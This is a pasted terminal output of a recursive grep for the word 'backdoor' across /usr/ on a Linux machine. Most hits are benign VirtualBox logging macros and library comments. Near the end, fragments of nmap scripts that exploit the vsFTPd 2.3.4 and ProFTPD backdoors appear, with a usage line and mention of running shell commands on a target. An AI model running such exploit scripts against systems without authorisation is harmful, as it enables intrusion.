Advertisement
Guest User

backdoor

a guest
Jan 13th, 2014
1,129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 40.43 KB | None | 0 0
  1. grep -Fri backdoor /usr/
  2. grep: /usr/lib/cups/backend/serial: Permission denied
  3. /usr/lib/perl5/Net/SSLeay.pod:backdoors, and general suitability for your application.
  4. Binary file /usr/lib/codecs/drv4.so.6.0 matches
  5. Binary file /usr/lib/codecs/drv3.so.6.0 matches
  6. grep: /usr/lib/virtualbox/VBoxNetDHCP: Permission denied
  7. Binary file /usr/lib/virtualbox/VBoxDD.so matches
  8. grep: /usr/lib/virtualbox/VBoxNetNAT: Permission denied
  9. Binary file /usr/lib/virtualbox/VBoxBalloonCtrl matches
  10. Binary file /usr/lib/virtualbox/VBoxHeadless.so matches
  11. Binary file /usr/lib/virtualbox/components/VBoxC.so matches
  12. grep: /usr/lib/virtualbox/VBoxSDL: Permission denied
  13. Binary file /usr/lib/virtualbox/VBoxDD2.so matches
  14. Binary file /usr/lib/virtualbox/VBoxPython2_7.so matches
  15. Binary file /usr/lib/virtualbox/VBoxPython.so matches
  16. Binary file /usr/lib/virtualbox/VBoxSDL.so matches
  17. Binary file /usr/lib/virtualbox/VBoxXPCOMC.so matches
  18. grep: /usr/lib/virtualbox/VBoxNetAdpCtl: Permission denied
  19. Binary file /usr/lib/virtualbox/VBoxRT.so matches
  20. grep: /usr/lib/virtualbox/VBoxHeadless: Permission denied
  21. Binary file /usr/lib/virtualbox/VBoxAuthSimple.so matches
  22. Binary file /usr/lib/virtualbox/VBoxSVC matches
  23. Binary file /usr/lib/virtualbox/libvboxjxpcom.so matches
  24. Binary file /usr/lib/virtualbox/VBoxNetDHCP.so matches
  25. grep: /usr/lib/virtualbox/VirtualBox: Permission denied
  26. Binary file /usr/lib/virtualbox/VBoxManage matches
  27. Binary file /usr/lib/virtualbox/VBoxTestOGL matches
  28. Binary file /usr/lib/virtualbox/VBoxAutostart matches
  29. Binary file /usr/lib/virtualbox/VBoxNetNAT.so matches
  30. Binary file /usr/lib/virtualbox/VirtualBox.so matches
  31. grep: /usr/lib/virtualbox/VBoxVolInfo: Permission denied
  32. Binary file /usr/lib/virtualbox/VBoxSharedCrOpenGL.so matches
  33. Binary file /usr/lib/virtualbox/vboxwebsrv matches
  34. /usr/lib/python2.7/hmac.py:_secret_backdoor_key = []
  35. /usr/lib/python2.7/hmac.py: if key is _secret_backdoor_key: # cheap
  36. /usr/lib/python2.7/hmac.py: other = self.__class__(_secret_backdoor_key)
  37. Binary file /usr/lib/python2.7/hmac.pyc matches
  38. /usr/share/sphinx-voxforge-en/lm/voxforge_en_sphinx.cd_cont_3000/voxforge_en_sphinx.dic:backdoor B AE K D AO R
  39. /usr/share/sphinx-voxforge-en/lm/voxforge_en_sphinx.cd_cont_3000/voxforge_en_sphinx.dic:backdoors B AE K D AO R Z
  40. /usr/share/perl/5.14.2/CPAN.pm: # backdoor: I could not find a way to record sessions
  41. /usr/share/perl/5.14.2/Dumpvalue.pm: return if $self->{skipCvGV}; # Backdoor to avoid problems if XS broken...
  42. /usr/share/perl/5.14.2/dumpvar.pl: return if $skipCvGV; # Backdoor to avoid problems if XS broken...
  43. /usr/share/perl/5.14.2/CPANPLUS/Dist.pm: ### backdoor method to add more dist types
  44. /usr/share/perl/5.14.2/CPANPLUS/Dist.pm: ### backdoor method to exclude dist types
  45. /usr/share/perl/5.14.2/perl5db.pl: return if $skipCvGV; # Backdoor to avoid problems if XS broken...
  46. /usr/share/aptitude/README.it:le informazioni private o aprono backdoor nel sistema! Se questi pacchetti hanno
  47. /usr/share/aptitude/README:ssh...versions that steal your private information or open backdoors on your
  48. /usr/share/doc/libnet-ssleay-perl/copyright: backdoors, and general suitability for your application.
  49. /usr/share/doc/python-pexpect/examples/bd_client.py:"""This is a very simple client for the backdoor daemon. This is intended more
  50. grep: /usr/share/doc/google-chrome-stable: Permission denied
  51. Binary file /usr/share/virtualbox/VBoxGuestAdditions.iso matches
  52. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @name Backdoor Logging
  53. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LOG_TO_BACKDOOR
  54. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LOG_NO_BACKDOOR
  55. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
  56. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
  57. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
  58. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Disables all LogBackdoor* macros.
  59. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LogBackdoor
  60. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
  61. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  62. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
  63. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
  64. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LogBackdoorFlow
  65. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
  66. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  67. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
  68. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
  69. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:/** @def LogRelBackdoor
  70. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
  71. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
  72. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
  73. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
  74. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
  75. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define Log(a) LogBackdoor(a)
  76. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
  77. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
  78. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
  79. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  80. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
  81. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  82. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
  83. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
  84. /usr/share/virtualbox/src/vboxhost/vboxpci/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
  85. /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: /** VMM Device group for backdoor logging. */
  86. /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
  87. /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
  88. /usr/share/virtualbox/src/vboxhost/vboxpci/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
  89. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @name Backdoor Logging
  90. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LOG_TO_BACKDOOR
  91. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LOG_NO_BACKDOOR
  92. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
  93. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
  94. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
  95. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Disables all LogBackdoor* macros.
  96. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LogBackdoor
  97. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
  98. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  99. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
  100. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
  101. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LogBackdoorFlow
  102. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
  103. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  104. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
  105. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
  106. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:/** @def LogRelBackdoor
  107. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
  108. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
  109. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
  110. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
  111. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
  112. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define Log(a) LogBackdoor(a)
  113. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
  114. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
  115. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
  116. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  117. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
  118. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  119. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
  120. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
  121. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
  122. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: /** VMM Device group for backdoor logging. */
  123. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
  124. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
  125. /usr/share/virtualbox/src/vboxhost/vboxnetflt/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
  126. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @name Backdoor Logging
  127. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LOG_TO_BACKDOOR
  128. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LOG_NO_BACKDOOR
  129. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
  130. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
  131. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
  132. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Disables all LogBackdoor* macros.
  133. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LogBackdoor
  134. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
  135. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  136. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
  137. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
  138. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LogBackdoorFlow
  139. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
  140. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  141. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
  142. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
  143. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:/** @def LogRelBackdoor
  144. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
  145. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
  146. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
  147. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
  148. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
  149. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define Log(a) LogBackdoor(a)
  150. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
  151. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
  152. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
  153. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  154. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
  155. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  156. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
  157. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
  158. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
  159. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: /** VMM Device group for backdoor logging. */
  160. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
  161. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
  162. /usr/share/virtualbox/src/vboxhost/vboxnetadp/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
  163. /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c:static void myLogBackdoorPrintf(const char *pszFormat, ...)
  164. /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c: myLogBackdoorPrintf("\n!!Guest Assertion failed!!\n%s(%d) %s\n%s\n", uLine, pszFile, pszFunction, (pszExpr))
  165. /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c:# define RTAssertMsg2Weak myLogBackdoorPrintf
  166. /usr/share/virtualbox/src/vboxhost/vboxdrv/r0drv/linux/timer-r0drv-linux.c:# define RTTIMERLNX_LOG(a) myLogBackdoorPrintf a
  167. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @name Backdoor Logging
  168. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LOG_TO_BACKDOOR
  169. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LOG_NO_BACKDOOR
  170. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LOG_TO_BACKDOOR
  171. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Redirects the normal logging macros to the backdoor versions.
  172. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LOG_NO_BACKDOOR
  173. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Disables all LogBackdoor* macros.
  174. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LogBackdoor
  175. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Generic logging to the VBox backdoor via port I/O.
  176. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  177. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoor(a) RTLogBackdoorPrintf a
  178. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoor(a) do { } while (0)
  179. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LogBackdoorFlow
  180. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Logging of execution flow messages to the backdoor I/O port.
  181. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#if defined(LOG_ENABLED) && !defined(LOG_NO_BACKDOOR)
  182. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoorFlow(a) RTLogBackdoorPrintf a
  183. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogBackdoorFlow(a) do { } while (0)
  184. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:/** @def LogRelBackdoor
  185. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Release logging to the VBox backdoor via port I/O.
  186. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#if !defined(LOG_NO_BACKDOOR)
  187. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogRelBackdoor(a) RTLogBackdoorPrintf a
  188. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogRelBackdoor(a) do { } while (0)
  189. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:#ifdef LOG_TO_BACKDOOR
  190. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define Log(a) LogBackdoor(a)
  191. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogFlow(a) LogBackdoorFlow(a)
  192. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define LogRel(a) LogRelBackdoor(a)
  193. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:# define _LogIt(a_pvInst, a_fFlags, a_iGroup, ...) LogBackdoor((__VA_ARGS__))
  194. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  195. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintf(const char *pszFormat, ...);
  196. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h: * Prints a formatted string to the backdoor port.
  197. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/log.h:RTDECL(size_t) RTLogBackdoorPrintfV(const char *pszFormat, va_list args);
  198. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/mangling.h:# define RTLogBackdoorPrintf RT_MANGLER(RTLogBackdoorPrintf) /* r0drv-guest */
  199. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/iprt/mangling.h:# define RTLogBackdoorPrintfV RT_MANGLER(RTLogBackdoorPrintfV) /* r0drv-guest */
  200. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: /** VMM Device group for backdoor logging. */
  201. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: LOG_GROUP_DEV_VMM_BACKDOOR,
  202. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: /** VMM Device group for logging guest backdoor logging to stderr. */
  203. /usr/share/virtualbox/src/vboxhost/vboxdrv/include/VBox/log.h: "DEV_VMM_BACKDOOR", \
  204. /usr/share/virtualbox/src/vboxhost/vboxdrv/common/misc/assert.c: RTLogBackdoorPrintf("\n!!Assertion Failed!!\n"
  205. /usr/share/virtualbox/src/vboxhost/vboxdrv/common/misc/assert.c: RTLogBackdoorPrintfV(pszFormat, vaCopy);
  206. /usr/share/virtualbox/src/vboxhost/vboxdrv/VBox/log-vbox.c: * Enables logger output to special backdoor if in guest r0.
  207. /usr/share/virtualbox/src/vboxhost/vboxdrv/VBox/log-vbox.c: /* The user destination is backdoor logging. */
  208. /usr/share/mythes/th_en_US_v2.idx:backdoor|1245704
  209. /usr/share/mythes/th_en_US_v2.dat:(noun)|backdoor|access (generic term)
  210. /usr/share/mythes/th_en_US_v2.dat:(noun)|backdoor|access (generic term)|access code (generic term)
  211. /usr/share/mythes/th_en_US_v2.dat:(noun)|backdoor|back entrance|exterior door (generic term)|outside door (generic term)
  212. /usr/share/mythes/th_en_US_v2.dat:(noun)|back door|backdoor|exterior door (generic term)|outside door (generic term)
  213. /usr/share/mythes/th_en_US_v2.dat:backdoor|3
  214. /usr/share/nmap/scripts/script.db:Entry { filename = "ftp-proftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
  215. /usr/share/nmap/scripts/script.db:Entry { filename = "ftp-vsftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
  216. /usr/share/nmap/scripts/script.db:Entry { filename = "irc-unrealircd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
  217. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04
  218. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:(CVE-2011-2523). This script attempts to exploit the backdoor using the
  219. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:the <code>exploit.cmd</code> or <code>ftp-vsftpd-backdoor.cmd</code> script
  220. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: * http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
  221. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- nmap --script ftp-vsftpd-backdoor -p 21 <host>
  222. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- @args exploit.cmd or ftp-vsftpd-backdoor.cmd Command to execute in shell
  223. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | ftp-vsftpd-backdoor:
  224. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | vsFTPd version 2.3.4 backdoor
  225. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
  226. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | The backdoor was already triggered
  227. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
  228. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:-- Returns true, results if vsFTPd was backdoored
  229. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:local function check_backdoor(host, shell_cmd, vuln)
  230. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: "%s: service on port 6200 is not the vsFTPd backdoor: NOT VULNERABLE",
  231. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: local cmd = stdnse.get_script_args("ftp-vsftpd-backdoor.cmd") or
  232. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: title = "vsFTPd version 2.3.4 backdoor",
  233. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.]],
  234. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse:'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html',
  235. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: -- check to see if the vsFTPd backdoor was already triggered
  236. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: local status, ret = check_backdoor(host, cmd, vsftp_vuln)
  237. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: -- check if vsFTPd was backdoored
  238. /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse: status, ret = check_backdoor(host, cmd, vsftp_vuln)
  239. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous <code>id</code> command by default, but that can be changed with the <code>ftp-proftpd-backdoor.cmd</code> script argument.
  240. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- nmap --script ftp-proftpd-backdoor -p 21 <host>
  241. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- @args ftp-proftpd-backdoor.cmd Command to execute in shell (default is
  242. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- | ftp-proftpd-backdoor:
  243. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse:-- | This installation has been backdoored.
  244. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse: cmd = stdnse.get_script_args("ftp-proftpd-backdoor.cmd")
  245. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse: stdnse.print_debug(1, "This version is not known to be backdoored.")
  246. /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse: "This installation has been backdoored.",
  247. /usr/share/nmap/scripts/smb-psexec.nse:system, or even installing a backdoor on a collection of computers.
  248. /usr/share/nmap/scripts/smb-psexec.nse:or it can upload a program and run it, such as pwdump6 or a backdoor. Additionally, it
  249. /usr/share/nmap/scripts/smb-psexec.nse:generates a file), or it can just start the process and let it run headless (a backdoor
